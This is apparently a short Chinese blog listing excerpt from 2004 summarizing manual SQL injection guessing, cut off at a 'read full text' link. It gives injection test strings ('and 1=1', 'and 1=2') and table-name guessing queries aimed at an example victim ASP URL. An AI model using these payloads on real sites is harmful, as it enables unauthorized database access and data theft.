摘要:
Sql injection手工猜解总结 1 判断是否存在注入: ;and 1=1 ;and 1=2 2 猜表名: and 1=(select min(id) from 表名) or 0<>(Select count(*) from 表名) 例如: http://www.victim/list.asp?id=312 and 1=(select min(id) from admin) ... 阅读全文
posted @ 2004-09-06 21:05
anuxs
阅读(902)
评论(0)
推荐(0)

浙公网安备 33010602011771号